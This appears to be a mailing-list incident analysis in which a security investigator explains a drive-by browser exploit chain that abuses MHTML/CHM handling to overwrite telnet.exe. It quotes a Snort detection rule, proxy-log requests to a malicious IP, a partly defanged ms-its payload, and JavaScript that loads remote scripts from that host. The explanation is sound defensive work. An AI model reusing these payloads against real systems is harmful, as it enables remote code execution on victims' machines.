From: michael.hale at gmail.com (Michael Hale)
Subject: telnet URL type used in exploit

Darren,

Glad you asked. This was not something I wrote, rather something I
stumbled upon while investigating another exploit. It began with a
Snort alert per the following rule:

alert tcp any any -> $HOME_NET any (msg:"BLEEDING-EDGE Microsoft MHTML
URL Redirection Attempt"; flow:from_server,established;
content:"mhtml|3A|file|3A|"; nocase; )

Digging through proxy logs, I found the following pages, among others,
had been accessed by the victim PC:

GET http://213.159.117.133/dl/adv74.php -
GET http://213.159.117.133/dl/adv74/x.chm
GET http://213.159.117.133/dl/redir.php
GET http://213.159.117.133/dl/loaderadv74.jar

The first php file contained this:

location="javascript:'<SCRIPT
SRC=\\'http://213.159.117__.133/dl/loader_adv74.js

That caused the browser to dowload loader_adv74.js, which we will look
at in just a second. Finishing up with the first file, it also
contained this:

ms-its__mhtml__file://c__:\\nosuch.mht!__http://213.159.117.133/dl/adv74/x.chm__/x.htm

(Underscores to prevent poorly written IDS rules from alerting). You
are probably familiar with that; if not:

http://www.kb.cert.org/vuls/id/323070

If that exploit is successful, the code within the decompressed x.chm
runs in the local security zone. Meanwhile, the set has been prepared
by downloading loader_adv.js. It contained the following function:

function getRealShell() {
myiframe.document.write("<SCRIPT
SRC='http://213.159.117.133/dl/shellscript_adv74.js'><\/SCRIPT>");
}

It was this shellscript_adv74.js file that overwrites telnet.exe with
loadadv74.exe and asks the browser to fetch telnet://.

In this case it would make sense that the script will not exploit
patched browsers such as the one you tested with. It requires a
browser vulnerable to the MHTML exploit, which is how privileges to
overwrite telnet.exe are gained. You might assume that if someone
already has rights to do this, they could execute their code in
several other ways besides calling telnet://. I don't argue. I do
believe it was creative, though.